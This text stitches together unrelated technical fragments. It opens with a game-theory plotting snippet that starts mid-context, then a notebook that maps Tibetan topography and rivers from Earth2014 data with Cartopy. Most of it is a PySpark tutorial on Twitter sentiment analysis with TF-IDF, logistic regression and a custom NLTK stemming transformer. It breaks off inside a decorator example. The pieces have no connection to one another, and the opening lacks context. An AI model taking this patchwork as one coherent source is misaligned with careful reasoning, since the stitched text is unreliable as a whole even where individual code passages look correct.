Note that the rules for this configuration are *in addition* to the *first-in-time, first-in-right* rules, and they have been assigned priority 2 (the *first-in-time, first-in-right* rules were assigned priority 1, and the default rules were assigned priority 0, as usual).
```
game = build_full_game('.', 'fishers', threshold=2)
my_fig_kwargs = dict(figsize=(20,14), frameon=False)
fig = plot_game(game,
position_colors,
fig_kwargs=my_fig_kwargs,
node_kwargs=my_node_kwargs,
edge_kwargs=my_edge_kwargs,
edge_labels_kwargs=my_edge_labels_kwargs,
patch_kwargs=my_patch_kwargs,
legend_kwargs=my_legend_kwargs,
draw_utility=False,
info_sets_kwargs=my_info_sets_kwargs)
# fig.savefig('fishers_announce.png', bbox_inches='tight', dpi=200)
game.node_info
```
# Topography and rivers map of region (Tibet)
### Database
- [Earth2014](http://ddfe.curtin.edu.au/models/Earth2014/) (Arc‐min shape, topography, bedrock and ice‐sheet models)
### Package
- [Cartopy](https://scitools.org.uk/cartopy/docs/latest/) (A mapping and imaging package originating from the Met. Office in the UK)
Here downloads [Earth2014.TBI2014.5min.geod.bin](http://ddfe.curtin.edu.au/models/Earth2014/data_5min/topo_grids/)
```
import numpy as np
import os
import pyshtools as pysh
import cartopy
import cartopy.crs as ccrs
import cartopy.feature as cfeature
import matplotlib
import matplotlib.pyplot as plt
from matplotlib import cm
%matplotlib inline
#from matplotlib.colors import LightSource
#from mpl_toolkits.axes_grid1 import make_axes_locatable
dir_db = '../data/earth2014/data_5min/topo_grids'
fname_db = 'Earth2014.TBI2014.5min.geod.bin'
fname_save = 'Earth2014.TBI2014.5min'
fname_topo = os.path.join(dir_db,fname_db)
# This script shows how to access the data grids of the Earth2014 model
# Source code: access_Earth2014_grids5min.m (Christian Hirt, Moritz Rexer)
# grid definitions
res_deg = 5/60 # 5min data
extent_global = [-180, 180, -90, 90]
minlon,maxlon,minlat,maxlat = extent_global
lats = np.arange((minlat+res_deg/2),(maxlat-res_deg/4),res_deg)
lons = np.arange((minlon+res_deg/2),(maxlon-res_deg/4),res_deg)
nlat = len(lats)
nlon = len(lons)
order_db = nlat
minlon1,maxlon1,minlat1,maxlat1 = (lons.min(),lons.max(),lats.min(),lats.max())
extent_earth2014 = [minlon1,maxlon1,minlat1,maxlat1]
# read data
data_topo = np.fromfile(fname_topo, dtype='>i2').reshape((nlat, nlon))
data_topo = data_topo.astype(np.int16) # data = data.astype('<i2')
data_topo = np.flipud(data_topo)
# get SHCs
topo = pysh.SHGrid.from_array(data_topo)
coeffs = pysh.expand.SHExpandDH(topo.data, sampling=2)
```
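A note on the `dtype='>i2'` in the read above: the Earth2014 binary grids are stored as big-endian (`>`) 16-bit signed integers (`i2`), so the byte order must be stated explicitly on little-endian machines. A stdlib illustration of what goes wrong with the wrong byte order:

```
import struct

raw = struct.pack('>h', 1000)         # big-endian int16, as in the data file
big = struct.unpack('>h', raw)[0]     # correct interpretation
little = struct.unpack('<h', raw)[0]  # wrong byte order: garbage value
print(big, little)                    # -> 1000 -6141
```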
# Map
```
name_area ='Tibet'
extent_area = [65,110,15,45]
# TRR (88,108,20,36)
order_s = order_db
order_tRange = [1080,20]
#order_tRange = [2160,1080,720,540,360,240,120,80,40,30,20,15,10]
#order_tRange = [15,10,5,3,2,1]
# cartopy parameters
rivers = cfeature.NaturalEarthFeature('physical', 'rivers_lake_centerlines', '50m',
edgecolor='Blue', facecolor="none")
coastline = cfeature.NaturalEarthFeature('physical', 'coastline', '50m',
edgecolor=(0.0,0.0,0.0),
facecolor="none")
lakes = cfeature.NaturalEarthFeature('physical', 'lakes', '50m',
edgecolor="blue", facecolor="blue")
prj_base = ccrs.PlateCarree()
# plot parameters
extent_img = extent_earth2014
extent_fig = extent_area
xticks = np.arange(-180,210,5)
yticks = np.arange(-90,120,5)
dpi = 100
save_mode = True
arrow_width = 0.001
arrow_scale = 50000
# cmap = cm.terrain
# norm = matplotlib.colors.Normalize(vmin=-4e3, vmax=8e3)
!git clone https://github.com/shaharkadmiel/cmaptools
from cmaptools.cmaptools import readcpt, joincmap, DynamicColormap
# https://github.com/shaharkadmiel/cmaptools
#from cmaptools import readcpt, joincmap, DynamicColormap
cptfile1 = '../data/cpt/seafloor.cpt'
cmap1 = readcpt(cptfile1)
cptfile2 = '../data/cpt/dem2.cpt'
cmap2 = readcpt(cptfile2)
cmap = joincmap(cmap1, cmap2)
cmap.set_range(-4e3, 8e3)
norm = cmap.norm
# cptfile = 'mby.cpt'
# cmap = readcpt(cptfile)
# cmap.set_range(-4e3, 8e3)
# norm = cmap.norm
for i in range(0, len(order_tRange)):
    # filter by processing SHCs
    order_t = order_tRange[i]
    lmax = int(order_t + 1)
    coeffs_f = coeffs.copy()
    coeffs_f[:, lmax:, :] = 0.
    topo_f = pysh.expand.MakeGridDH(coeffs_f, sampling=2)

    # plot parameters
    #data_img = np.flipud(topo_f.copy()) # in local
    data_img = topo_f.copy() # in binder
    order_img = order_t
    fname_fig = name_area + '_' + fname_save + '.order' + str(order_img) + '_Rivers'

    # res_d = int(res/res_t)
    res_dy = 10
    res_dx = 10
    y = lats[::res_dy]
    x = lons[::res_dx]
    X, Y = np.meshgrid(x, y)
    ZZ = data_img.copy()
    ZZ[ZZ < -500.0] = -500.0
    ZZ = ZZ[::res_dy, ::res_dx]
    UY, UX = np.gradient(-ZZ)
    UX = UX.reshape((X.shape[0], X.shape[1]))
    UY = UY.reshape((X.shape[0], X.shape[1]))
    # mask = ZZ > -500.0
    # X_A = X[mask]
    # Y_A = Y[mask]
    # UX_A = UX[mask]
    # UY_A = UY[mask]

    fig = plt.figure(figsize=(10, 10), facecolor="none")
    ax = plt.axes(projection=prj_base)
    #ax.axis(extent_fig)
    ax.set(xlabel='Longitude', ylabel='Latitude', yticks=yticks, xticks=xticks)
    ax.minorticks_on()
    ax.set_title(fname_fig)
    ax.set_extent(extent_fig)
    # data_img2 = data_img.copy()
    # data_img2[abs(data_img-0) < 10.] = 10.
    im = ax.imshow(data_img, extent=extent_img, cmap=cmap, norm=norm) #,transform=prj_base)
    ax.streamplot(X, Y, UX, UY, density=1.0, color='#883300', zorder=2)
    #ax.quiver(X_A, Y_A, UX_A, UY_A, width=arrow_width, scale=arrow_scale, zorder=3)
    #ax.contour(X, Y, ZZ, zorder=4)
    # divider = make_axes_locatable(ax)
    # cax = divider.append_axes("right", size="5%", pad=0.05)
    # cbar = plt.colorbar(im, cax=cax)
    # cbar.set_label('Elevation [m]')
    ax.add_feature(coastline, linewidth=1.5, edgecolor="Black", zorder=5)
    ax.add_feature(rivers, linewidth=1.0, edgecolor="#0077FF", zorder=6)
    ax.add_feature(lakes, linewidth=0, edgecolor="Blue", facecolor="#4477FF", zorder=7, alpha=0.5)

    if save_mode == True:
        plt.savefig((fname_fig + '.png'), dpi=dpi)
    plt.show()
```
# Sentiment Analysis, Part 2:
Machine Learning With Spark On Google Cloud
---------------
__[1. Introduction](#bullet1)__
__[2. Creating A GCP Hadoop Cluster ](#bullet2)__
__[3. Getting Data From An Atlas Cluster](#bullet3)__
__[4. Basic Models With Spark ML Pipelines](#bullet4)__
__[5. Stemming With Custom Transformers](#bullet5)__
__[6. N-Grams & Parameter Tuning Using A Grid Search](#bullet6)__
__[7. Conclusions](#bullet7)__
## Introduction <a class="anchor" id="bullet1"></a>
--------------
In the <a href="http://michael-harmon.com/blog/SentimentAnalysisP1.html">first part</a> of this two part blog post I went over the basics of ETL with PySpark and MongoDB. In this second part I will go over the actual machine learning aspects of sentiment analysis using <a href="https://spark.apache.org/docs/latest/ml-guide.html">SparkML</a> (aka MLlib, it seems the name is changing). Specifically, we'll be using <a href="https://spark.apache.org/docs/latest/ml-pipeline.html">ML Pipelines</a> and <a href="https://en.wikipedia.org/wiki/Logistic_regression">Logistic Regression</a> to build a basic linear classifier for sentiment analysis. Many people use Support Vector Machines (SVM) because they handle high dimensional data well (which NLP problems definitely are) and allow for the use of non-linear kernels. However, given the number of samples in our dataset and the fact Spark's <a href="https://spark.apache.org/docs/2.3.2/ml-classification-regression.html#linear-support-vector-machine">SVM</a> only supports linear Kernels (which have comparable performance to logistic regression) I decided to just stick with the simpler model, aka logistic regression.
After we build a baseline model for sentiment analysis, I'll introduce techniques to improve performance like removing stop words and using N-grams. I also introduce a custom Spark <a href="https://spark.apache.org/docs/1.6.2/ml-guide.html#transformers">Transformer</a> class that uses the <a href="https://www.nltk.org/">NLTK</a> to perform stemming. Lastly, we'll review <a href="https://spark.apache.org/docs/latest/ml-tuning.html">hyper-parameter tuning</a> with cross-validation to optimize our model. The point of this post *is not to build the best classifier on a huge dataset, but rather to show how to piece together advanced concepts using PySpark... and at the same time get reasonable results.*
That said we will continue to use the 1.6 million <a href="https://www.kaggle.com/kazanova/sentiment140">tweets</a> from Kaggle which I loaded into my <a href="https://www.mongodb.com/cloud/atlas">Atlas MongoDB</a> cluster with the Spark ETL job that was discussed in the previous <a href="http://michael-harmon.com/blog/SentimentAnalysisP1.html">post</a>. While 1.6 million tweets doesn't necessitate a distributed environment, using PySpark on this dataset was a little too much for my wimpy 2013 Macbook Air and I needed to use a more powerful machine. Luckily <a href="https://cloud.google.com/">Google Cloud Platform</a> (GCP) gives everyone free credits to start using their platform and I was able to use Spark on a <a href="https://hadoop.apache.org/">Hadoop</a> cluster using <a href="https://cloud.google.com/dataproc/">dataproc</a> and <a href="https://cloud.google.com/datalab/">datalab</a>.
Let's get started!
## Creating A GCP Hadoop Cluster <a class="anchor" id="bullet2"></a>
---------
I have been using Hadoop and Spark for quite some time now, but have never spun up my own cluster and gained a newfound respect for Hadoop admins. While Google does make the process easier, I still had to ask a friend for help to get things to work the way I wanted them to. Between getting the correct version of Python as well as the correct version of NLTK on both the driver and worker nodes, the correct MongoDB connection for PySpark 2.3.2 and the time it takes to spin up and spin down a cluster, I was very much done configuring Hadoop clusters on my own. I want to say that made me a better person or at least a better data scientist, but I'm not so sure. :)
To start up the Hadoop cluster with two worker nodes (with the GCP free trial I could only use two worker nodes) I used the command below:

You can see the dataproc image version, the string for the MongoDB connection, as well as the version of Python in the above commands. The bash scripts that I reference in my Google storage bucket for this project can be obtained from my repo <a href="https://github.com/mdh266/SentimentAnalysis/tree/master/GCP">here</a>. After the cluster is created we can ssh onto the master node by going to the console and clicking on the "*Compute Engine*" tab. You will see a page like the one below:

We can ssh onto the master node using the ssh tab to the right of the instance named **mikescluster-m**. The "-m" signifies it is the master node while the other instances have "-w" signifying they are worker nodes. After connecting to the master node you can see all the <a href="https://data-flair.training/blogs/top-hadoop-hdfs-commands-tutorial/">Hadoop commands</a> available:

We won't work on our Hadoop cluster through command line, but rather connect to the cluster through Jupyter notebooks using Google <a href="https://cloud.google.com/datalab/">datalab</a>. To do this involves creating an ssh-tunnel and proxy for Chrome, both of which I had no idea how to do, but luckily the same friend from before walked me through it. The bash scripts I used to do these last two procedures are located in my repo <a href="https://github.com/mdh266/SentimentAnalysis/tree/master/GCP">here</a>. After those steps were completed we can enter the address into our web browser to see the Jupyter notebooks,
http://mikescluster-m:8080
Note that the notebooks are running on the master node using port 8080 and that <a href="https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/YARN.html">YARN</a> can be seen from the same web address, but using port 8088. I'll come back to YARN a little later. Now that we have our Hadoop cluster up and running on Google Cloud we can talk about how to access our data.
## Getting The Dataset From An Atlas Cluster <a class="anchor" id="bullet3"></a>
---------
As I mentioned in the introduction I loaded the cleaned Twitter dataset into my Atlas MongoDB cluster as I discussed in the previous <a href="http://michael-harmon.com/blog/SentimentAnalysisP1.html">post</a>. In this post I won't go over the ETL process again, but will show how to connect PySpark to the Atlas cluster. One thing to highlight here is that in order to keep my collection within the memory limits of the free tier I had to store the data as strings instead of tokens as I showed in the previous post. (See the ETL job <a href="https://github.com/mdh266/SentimentAnalysis/blob/master/ETL/BasicETL.py">here</a> for details.) Therefore we'll have to tokenize our strings again here.
The first step to connecting to the database is to create a connection url string that contains the cluster address, user info, password as well as database and collection name in the dictionary below:
```
mongo_conn = {"address" : "harmoncluster-xsarp.mongodb.net/",
"db_name" : "db_twitter",
"collection" : "tweets",
"user" : "",
"password" : ""}
url = "mongodb+srv://{user}:{password}@{address}{db_name}.{collection}".format(**mongo_conn)
```
Then we create a dataframe from the documents in the collection using the <code>spark.read</code> command, passing in the connection url as our option and specifying that we are using MongoDB as the format:
```
df = spark.read\
.format("com.mongodb.spark.sql.DefaultSource")\
.option("uri",url)\
.load()
```
At this point the collection on the Atlas cluster has not actually been pulled to our Hadoop cluster (Spark reads are lazy), but we would already see an error if there were a mistake in our connection string. Additionally, the dataframe already lets us see some metadata on the collection, i.e. the "schema",
```
df.printSchema()
```
You can see that each document has an <code>id</code>, <code>sentiment</code> and cleaned tweet. Let's just pull the <code>tweet_clean</code> as well as `sentiment` fields and rename `sentiment` to `label`:
```
df2 = df.select("tweet_clean","sentiment")\
.withColumnRenamed("sentiment", "label")
```
Then let's split the dataframe into training and testing sets (using 80% of the data for training and 20% for testing) with a seed (1234),
```
train, test = df2.randomSplit([0.80, 0.20], 1234)
```
Now we can look at the number of tweets in the training set that have positive and negative sentiment. Note, since we will be using this dataframe many times below we will cache it to achieve better runtime performance.
```
train.cache()
train.groupby("label")\
.count()\
.show()
```
We can see that the two classes are well balanced, with over half a million positive and negative tweets. We do the same for the testing set:
```
test.cache()
test.groupby("label")\
.count()\
.show()
```
Again, the classes are well balanced. This is great because we don't have to worry about dealing with imbalanced classes and *accuracy and ROC's area under the curve (AUC) are good metrics to see how well our models are performing.*
Now let's build our baseline model.
## Basic Models With Spark ML Pipelines <a class="anchor" id="bullet4"></a>
------------
In this section I'll go over how to build a basic logistic regression model using Spark <a href="https://spark.apache.org/docs/latest/ml-pipeline.html">ML Pipelines</a>. ML Pipelines are similar to <a href="https://scikit-learn.org/stable/modules/generated/sklearn.pipeline.Pipeline.html">Scikit-learn Pipelines</a>. We import the basic modules:
```
from pyspark.ml import Pipeline
from pyspark.ml.feature import Tokenizer, HashingTF, IDF
from pyspark.ml.classification import LogisticRegression
from pyspark.ml.evaluation import BinaryClassificationEvaluator
```
Next we instantiate our classification evaluator class and pass it the name of the model's raw prediction output column:
```
evaluator = BinaryClassificationEvaluator(rawPredictionCol="rawPrediction")
# get the name of the metric used
evaluator.getMetricName()
```
We'll be using the <a href="https://en.wikipedia.org/wiki/Bag-of-words_model">bag of words (BOW) model</a> to build features from tweets for our model. *In the bag-of-words model, a document (in this case tweet) is represented as "bag" or list of its words, disregarding grammar and ordering, but keeping the multiplicity of the words.* A two document example is:
- **D1:** Hi, I am Mike and I like Boston.
- **D2:** Boston is a city and people in Boston like the Red Sox.
From these two documents, a list, or 'bag-of-words', is constructed:

    bag = ['Hi', 'I', 'am', 'Mike', 'and', 'like', 'Boston', 'is',
           'a', 'city', 'people', 'in', 'the', 'Red', 'Sox']

Notice how in our bag-of-words we have dropped the repetitions of the words 'I', 'and', 'like' and 'Boston'. I will show how the multiplicity of words enters into our model next.
After transforming the text (all documents) into a "bag of words" we generate a vector for each document that represents the number of times each word (or more generally token) in the BOW appears in the text. The order of entries in the BOW vector corresponds to the order of the entries in the bag-of-words list. For example, document D1 would have the vector,

    [1, 2, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0]

while the second document, D2, would have the vector,

    [0, 0, 0, 0, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1]
Each entry of the lists refers to frequency or count of the corresponding entry in the bag-of-words list. When we have a stacked collection of (row) vectors, or matrix, where each row corresponds to a document (vector), and each column corresponds to a word in the bag-of-words list, then this will be known as our **term-frequency ($\text{tf}$) [document matrix](https://en.wikipedia.org/wiki/Document-term_matrix)**. The general formula for an entry in the $\text{tf}$ matrix is,
$$\text{tf}(t,d) \, = \, f_{t,d}$$
where $f_{t,d}$ is the number of times the term $t$ occurs in document $d \in \mathcal{D}$, where $\mathcal{D}$ is our text corpus. We can create a term-frequency matrix using Spark's <a href="https://spark.apache.org/docs/latest/ml-features.html#tf-idf">HashingTF</a> class. To see the difference between HashingTF and <a href="https://spark.apache.org/docs/latest/ml-features.html#countvectorizer">CounterVectorizer</a> see this <a href="https://stackoverflow.com/questions/35205865/what-is-the-difference-between-hashingtf-and-countvectorizer-in-spark">stackoverflow post</a>.
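The term-frequency vectors above can be reproduced in a few lines of plain Python (lowercasing and stripping punctuation for simplicity; `HashingTF` instead hashes each token into a fixed-size vector so no vocabulary dictionary needs to be stored):

```
from collections import Counter

docs = ["Hi, I am Mike and I like Boston.",
        "Boston is a city and people in Boston like the Red Sox."]

def tokenize(doc):
    # crude tokenizer: lowercase and drop the punctuation used in the example
    return doc.lower().replace(',', '').replace('.', '').split()

# Build the vocabulary (bag of words) in first-seen order
vocab = []
for doc in docs:
    for tok in tokenize(doc):
        if tok not in vocab:
            vocab.append(tok)

def tf_vector(doc):
    counts = Counter(tokenize(doc))
    return [counts[tok] for tok in vocab]

print(tf_vector(docs[0]))  # -> [1, 2, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0]
```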
Most often term-frequency alone is not a good measure of the importance of a word/term to a document's sentiment. Very common words like "the", "a", "to" are almost always the terms with the highest frequency in the text. Thus, having a high raw count of the number of times a term appears in a document does not necessarily mean that the corresponding word is more important to the sentiment of the document.
To circumvent the limitation of term-frequency, we often normalize it by the **inverse document frequency (idf)**. This results in the **term frequency-inverse document frequency (tf-idf)** matrix. The *inverse document frequency is a measure of how much information the word provides, that is, whether the term is common or rare across all documents in the corpus*. We can give a formal definition of the inverse document frequency by letting $\mathcal{D}$ be the corpus or the set of all documents, $N_{\mathcal{D}}$ be the number of documents in the corpus and $N_{t,\mathcal{D}}$ be the number of documents that contain the term $t$; then,
$$idf(t,\mathcal{D}) \, = \, \log\left(\frac{N_{\mathcal{D}}}{1 + N_{t,\mathcal{D}}}\right) \, = \, - \log\left(\frac{1 + N_{t,\mathcal{D}}}{N_{\mathcal{D}}}\right) $$
The reason for the presence of the $1$ is for smoothing. Without it, if the term/word did not appear in any training documents, then its inverse document frequency would be $idf(t,\mathcal{D}) = \infty$. However, with the presence of the $1$ it instead takes the finite value $idf(t,\mathcal{D}) = \log\left(N_{\mathcal{D}}\right)$.
Now we can formally define the term frequency-inverse document frequency as a normalized version of term-frequency,
$$\text{tf-idf}(t,d) \, = \, tf(t,d) \cdot idf(t,\mathcal{D}) $$
Like the term-frequency, the term frequency-inverse document frequency is a sparse matrix, where again, each row is a document in our training corpus ($\mathcal{D}$) and each column corresponds to a term/word in the bag-of-words list. The $\text{tf-idf}$ matrix can be constructed using the <a href="https://spark.apache.org/docs/latest/ml-features.html#tf-idf">SparkML IDF</a> class.
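As a quick sanity check of these formulas, here is a plain-Python version of the smoothed idf and the tf-idf weight. The toy corpus is made up for illustration; Spark's IDF class uses a similar (but not identical) smoothed formula internally.

```python
import math

def idf(term, docs):
    # smoothed inverse document frequency: log(N_D / (1 + N_{t,D}))
    n_docs = len(docs)
    n_containing = sum(1 for d in docs if term in d)
    return math.log(n_docs / (1 + n_containing))

def tf_idf(term, doc, docs):
    # tf-idf(t, d) = tf(t, d) * idf(t, D)
    return doc.count(term) * idf(term, docs)

corpus = [["spark", "is", "fast"],
          ["spark", "streaming"],
          ["pandas", "is", "nice"],
          ["the", "the", "cat"]]

# "the" appears in 1 of 4 documents: idf = log(4 / 2) = log 2
weight = tf_idf("the", corpus[3], corpus)  # 2 * log 2
```

Note that with this smoothed form, a term appearing in every document gets a negative weight, which is one way the formula down-weights very common words.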
Now that we have gotten the definition of TF-IDF out of the way we can discuss the steps in building a basic pipeline. These include,
- tokenization
- creating term frequency
- creating term frequency inverse document frequency
- fitting a logistic regression model to the BOW created from the previous steps
This is all done (amazingly!) in the short few lines below:
```
# create tokens from tweets
tk = Tokenizer(inputCol= "tweet_clean", outputCol = "tokens")
# create term frequencies for each of the tokens
tf1 = HashingTF(inputCol="tokens", outputCol="rawFeatures", numFeatures=1e5)
# create tf-idf for each of the tokens
idf = IDF(inputCol="rawFeatures", outputCol="features", minDocFreq=2.0)
# create basic logistic regression model
lr = LogisticRegression(maxIter=20)
# create entire pipeline
basic_pipeline = Pipeline(stages=[tk, tf1, idf, lr])
```
The setting `numFeatures=1e5` means that our bag-of-words "vocabulary" contains 100,000 words (see the stackoverflow post linked above for an explanation of what this means). The filter `minDocFreq=2.0` requires that a word or token must appear in a minimum of 2 documents to be counted as a feature (column). **This parameter can act as a form of regularization. Setting this value to larger integers increases the regularization by reducing the number of words we consider.** This helps to combat overfitting by eliminating words which occur very rarely so that they do not influence our model.
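The `numFeatures` setting works through the "hashing trick": instead of storing an explicit vocabulary, each token is hashed to a column index modulo `numFeatures`, so distinct words can collide into the same bucket. A toy sketch of the idea (Spark uses MurmurHash3; Python's built-in `hash` is used here purely for illustration and is not the same function):

```python
def hashed_tf(tokens, num_features):
    # map each token to a bucket by hashing; colliding tokens merge their counts
    vec = [0] * num_features
    for tok in tokens:
        vec[hash(tok) % num_features] += 1
    return vec

# a deliberately tiny feature space, so collisions are likely
vec = hashed_tf(["not", "bad", "not", "bad", "at", "all"], 16)
# the vector entries always sum to the number of tokens
```

Making `numFeatures` larger reduces the chance of collisions at the cost of a higher-dimensional (though still sparse) feature space.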
Now we can execute the entire pipeline of tokenization, feature extraction (tf-idf) and model training all with the following command:
```
model1 = basic_pipeline.fit(train)
```
Once we have trained the pipeline model we can evaluate its performance on the testing set using the <code>transform</code> method and the <code>evaluate</code> method of the evaluator object.
```
# predict on test set
predictions1 = model1.transform(test)
# get the performance on the test set
score1 = evaluator.evaluate(predictions1)
print("AUC SCORE: {}".format(score1))
```
We can also get the accuracy on the testing set. I couldn't really find any good documentation on how to do this without using the old MLlib (RDD-based) library. What made this process even more confusing is that I had to use the <a href="https://spark.apache.org/docs/2.3.2/mllib-evaluation-metrics.html">MulticlassMetrics</a> class to evaluate the binary outcome (the `BinaryClassificationMetrics` class only provides the area under the ROC curve and the area under the Precision-Recall curve). The code snippet to get the accuracy on the testing set is:
```
predictedAndLabels = predictions1.select(["prediction","label"])\
.rdd.map(lambda r : (float(r[0]), float(r[1])))
from pyspark.mllib.evaluation import MulticlassMetrics
metrics = MulticlassMetrics(predictedAndLabels)
print("Test Set Accuracy: {}".format(metrics.accuracy))
```
A score of 0.885 for the AUC of the ROC curve and 81% accuracy is pretty good for Twitter sentiment analysis, but let's see if we can make any improvements using more techniques from natural language processing.
### Removing Stop Words
One trick people use as a preprocessing step in NLP is to remove stop words, i.e. common words that do not add any additional information to the model. Examples of stop words are: 'a', 'the', 'and', etc. We will remove stop words from our tokens by using the <a href="https://spark.apache.org/docs/2.3.2/ml-features.html#stopwordsremover">StopWordsRemover</a> class. We import it below,
```
from pyspark.ml.feature import StopWordsRemover
```
Then instantiate a new StopWordsRemover object setting the input column to be the result of the tokenization procedure. Notice that the input column name for the HashingTF object is the same as the output column name for the StopWordsRemover:
```
sw = StopWordsRemover(inputCol="tokens", outputCol="filtered")
tf2 = HashingTF(inputCol="filtered", outputCol="rawFeatures", numFeatures=1e5)
```
We can define our pipeline, train the new model and evaluate its performance on the testing set:
```
sw_pipeline = Pipeline(stages=[tk, sw, tf2, idf, lr])
model2 = sw_pipeline.fit(train)
predictions2 = model2.transform(test)
score2 = evaluator.evaluate(predictions2)
print("AUC SCORE: {}".format(score2))
```
Notice how easy it was to add a new stage to our ML Pipeline model!
We can see that the AUC for our ROC went down by a little over 1.5%. At first I was pretty puzzled by this and spent a lot of time trying to fix it, only to learn that blindly removing stop words isn't always the best practice for sentiment analysis, especially when it comes to <a href="http://www.lrec-conf.org/proceedings/lrec2014/pdf/292_Paper.pdf">tweets</a>. Since removing stop words gave our model worse performance, we won't use it going forward. However, it's worthwhile to see examples of the words that were removed:
```
predictions2.select(["tweet_clean","tokens","filtered"]).show(5)
```
We can see that words like, 'a', 'and', 'was', and 'both' were removed. Removing stop words is more helpful for the case of <a href="http://michael-harmon.com/blog/NLP.html">document classification</a>, where often the class a document belongs to is determined by a few key words and removing stop words can help to understand what those key words are.
## Stemming With Custom Transformers <a class="anchor" id="bullet5"></a>
------------
Another technique for preprocessing in NLP is stemming. We will use the Natural Language Tool Kit (<a href="https://www.nltk.org/">NLTK</a> ) with the Porter Stemmer for stemming. Stemming is the process of reducing words down to their root; for example from Wikipedia:
...the Porter algorithm reduces argue, argued, argues, arguing, and argus to the stem argu
Stemming is used as an approximate method for grouping words with a similar basic meaning together. For NLP and the bag-of-words model this reduces the dimension of our feature space since variations of words that would normally be counted separately are reduced to one word that is counted collectively.
For some reason gcloud kept installing the wrong version of NLTK, and in order to get the correct version on both the driver and the workers I had to install it from within the notebook.
```
%sh
pip install -U nltk==3.4
```
Now we can import NLTK and check that its version is correct.
```
import nltk
print(nltk.__version__)
from nltk.stem.porter import PorterStemmer
```
Before we dive into using NLTK with PySpark let's go over an example how stemming with the NLTK works on a simple sentence. First we instantiate the PorterStemmer object and tokenize a sentence:
```
stemmer = PorterStemmer()
tokens = "my feelings having studied all day".split(" ")
print("raw tokens: {}".format(tokens))
```
Then we can apply the stemmer's stem function to each token in the array:
```
tokens_stemmed = [stemmer.stem(token) for token in tokens]
print("clean tokens: {}".format(tokens_stemmed))
```
We can see that the word 'feelings' has been reduced to 'feel', 'having' to 'have' and 'studied' to 'studi'. I should note that stemming, like stop word removal, might not always be helpful in deciding the sentiment since the way a word is used might affect the sentiment.
In order to use the Porter stemmer within an ML Pipeline we must create a custom <a href="https://spark.apache.org/docs/latest/ml-pipeline.html#transformers">Transformer</a>. The Transformer class will allow us to apply non-Spark functions and transformations as stages within our ML Pipeline. We create a custom `PorterStemming` class which extends PySpark's Transformer class, HasInputCol class and HasOutputCol class; see <a href="https://github.com/apache/spark/blob/master/python/pyspark/ml/param/shared.py">here</a> for these class definitions. This was also the first time I have used <a href="https://www.programiz.com/python-programming/multiple-inheritance">multiple inheritance</a> in Python, which is pretty cool!
```
from pyspark import keyword_only
import pyspark.sql.functions as F
from pyspark.sql import DataFrame
from pyspark.sql.types import ArrayType, StringType
from pyspark.ml import Transformer
from pyspark.ml.param.shared import HasInputCol, HasOutputCol, Param
class PorterStemming(Transformer, HasInputCol, HasOutputCol):
"""
PorterStemming class using the NLTK Porter Stemmer
This comes from https://stackoverflow.com/questions/32331848/create-a-custom-transformer-in-pyspark-ml
Adapted to work with the Porter Stemmer from NLTK.
"""
@keyword_only
def __init__(self,
inputCol : str = None,
outputCol : str = None,
min_size : int = None):
"""
Constructor takes in the input column name, output column name,
plus the minimum length of a token (min_size)
"""
# call the parent class constructors since we're extending them
super(Transformer, self).__init__()
# create a Param object for the minimum token size
self.min_size = Param(self, "min_size", "")
self._setDefault(min_size=0)
# set the input keyword arguments
kwargs = self._input_kwargs
self.setParams(**kwargs)
# initialize Stemmer object
self.stemmer = PorterStemmer()
@keyword_only
def setParams(self,
inputCol : str = None,
outputCol : str = None,
min_size : int = None
) -> None:
"""
Function to set the keyword arguments
"""
kwargs = self._input_kwargs
return self._set(**kwargs)
def _stem_func(self, words : list) -> list:
"""
Stemmer function call that performs stemming on a
list of tokens in words and returns a list of tokens
that meet the minimum length requirement.
"""
# We need a way to get min_size and cannot access it
# with self.min_size
min_size = self.getMinSize()
# stem the actual tokens by applying
# self.stemmer.stem function to each token in
# the words list
stemmed_words = map(self.stemmer.stem, words)
# now create the new list of tokens from
# stemmed_words by filtering out those
# that are not of length > min_size
filtered_words = filter(lambda x: len(x) > min_size, stemmed_words)
return list(filtered_words)
def _transform(self, df: DataFrame) -> DataFrame:
"""
Transform function is the method that is called in the
ML Pipeline. We have to override this function for our own use
and have it call the _stem_func.
Notice how it takes in a type DataFrame and returns type Dataframe
"""
# Get the names of the input and output columns to use
out_col = self.getOutputCol()
in_col = self.getInputCol()
# create the stemming function UDF by wrapping the stemmer
# method function
stem_func_udf = F.udf(self._stem_func, ArrayType(StringType()))
# now apply that UDF to the column in the dataframe to return
# a new column that has the same list of words after being stemmed
df2 = df.withColumn(out_col, stem_func_udf(df[in_col]))
return df2
def setMinSize(self,value):
"""
This method sets the minimum size value
for the _paramMap dictionary.
"""
self._paramMap[self.min_size] = value
return self
def getMinSize(self) -> int:
"""
This method uses the parent classes (Transformer)
.getOrDefault method to get the minimum
size of a token.
"""
return self.getOrDefault(self.min_size)
```
After looking at the PySpark <a href="https://github.com/apache/spark/blob/master/python/pyspark/ml/base.py">source code</a> I learned that the Transformer class is an <a href="https://docs.python.org/3/glossary.html#term-abstract-base-class">abstract base class</a> that specifically requires users to override the <code>_transform</code> method. After a lot of trial and error I found that the key steps to creating a custom transformer are:
- Creating a <code>Param</code> object (see <a href="https://github.com/apache/spark/blob/master/python/pyspark/ml/param/__init__.py">here</a> for the class definition) for each parameter in the constructor; these hold the user-defined parameter names, values and default values.
- Create the `_input_kwargs` member variable and set it.
- Write a new definition for the <code>_transform</code> method that applies a custom transformation to the <code>inputCol</code> of the dataframe and returns the same dataframe with a new column named <code>outputCol</code> containing the result of the transformation.
I was also curious about the <code>keyword_only</code> decorator and after <a href="http://spark.apache.org/docs/2.2.0/api/python/_modules/pyspark.html">digging deeper</a> found it is "a decorator that forces keyword arguments in the wrapped method and saves actual input keyword arguments in `_input_kwargs`."
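A simplified sketch of what such a decorator might look like is below. This mimics, but does not reproduce, PySpark's implementation (the real version differs in details, e.g. thread-safety handling in newer Spark releases):

```python
import functools

def keyword_only(func):
    # force keyword-only calls and stash the passed kwargs on the instance,
    # where setParams can later pick them up via self._input_kwargs
    @functools.wraps(func)
    def wrapper(self, *args, **kwargs):
        if args:
            raise TypeError("Method %s only takes keyword arguments." % func.__name__)
        self._input_kwargs = kwargs
        return func(self, **kwargs)
    return wrapper

class Demo:
    @keyword_only
    def __init__(self, inputCol=None, outputCol=None):
        self.inputCol = inputCol
        self.outputCol = outputCol

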